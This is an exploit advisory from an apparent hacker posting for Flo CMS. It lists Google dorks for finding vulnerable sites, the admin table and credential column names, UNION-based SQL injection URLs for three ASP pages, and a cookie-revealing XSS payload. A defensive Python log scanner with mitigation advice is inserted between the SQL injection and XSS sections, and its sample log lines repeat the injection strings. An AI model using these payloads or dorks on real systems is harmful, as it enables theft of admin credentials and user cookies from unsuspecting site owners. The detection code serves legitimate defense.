
Flo CMS Multiple SQL Injection Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.flocms.ie/
.:. Dork : [1]inurl:"index.asp?catId=" "powered by Flo CMS"
[2]inurl:"blog_detail.asp?postId=" "powered by Flo CMS"
####################################################################
===[ Exploit ]===

Multiple SQL Injection:
=======================

1-type injection: Double Query
[Information]
=============
Table Admin: tbladminlogin
Columns: AdminuserId,admin_username,password,admin_name


www.site.com/index.asp?catId=[!inject!]


2-type injection: Classic Injection

www.site.com/blog_detail.asp?postId=558' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- -

www.site.com/blog_profile.asp?userId=39' and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9-- -
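For defenders reviewing a Flo CMS install, the three parameters above can be checked in IIS logs. The following is an added example, not part of the original advisory or of Flo CMS: it scans a W3C-format log for requests where catId, postId or userId is not a plain integer. The log lines are constructed, and treating the IDs as integers is an assumption based on the values shown above (558, 39).

```python
import re
from urllib.parse import parse_qsl

# Pages and ID parameters named in the advisory (matched case-insensitively).
ID_PARAMS = {"/index.asp": "catid",
             "/blog_detail.asp": "postid",
             "/blog_profile.asp": "userid"}
# Assumption: legitimate IDs are short decimal integers.
PLAIN_INT = re.compile(r"[0-9]{1,10}")

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-06-10 10:00:01 192.0.2.10 GET /index.asp catId=12 200
2013-06-10 10:00:05 192.0.2.44 GET /blog_detail.asp postId=558'+and+1=2+UNION+SELECT+1,2,3--+- 500
2013-06-10 10:00:09 192.0.2.44 GET /blog_profile.asp userId=39%27+and+1%3D2 200
2013-06-10 10:00:12 192.0.2.10 GET /blog_detail.asp postId=558 200
2013-06-10 10:00:15 192.0.2.10 GET /default.asp - 200
"""

def suspicious_requests(log_text):
    """Return (client_ip, page, parameter, decoded_value) for every request
    whose ID parameter on a listed page is not a plain integer."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem = row.get("cs-uri-stem", "").lower()
        param = ID_PARAMS.get(stem)
        if param is None:
            continue                        # not one of the listed pages
        query = row.get("cs-uri-query", "")
        if query == "-":                    # IIS writes "-" for an empty field
            query = ""
        # parse_qsl URL-decodes the value, so ' and %27 are treated alike.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == param and not PLAIN_INT.fullmatch(value):
                hits.append((row.get("c-ip"), stem, name, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the application before the value reaches a query (together with parameterized queries), closes the injection points rather than only detecting their use.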

Cross-Site Scripting:
=====================

www.site.com/textos.php?id='"()%26%251<ScRiPt >prompt(document.cookie)<%2fScRiPt>



####################################################################
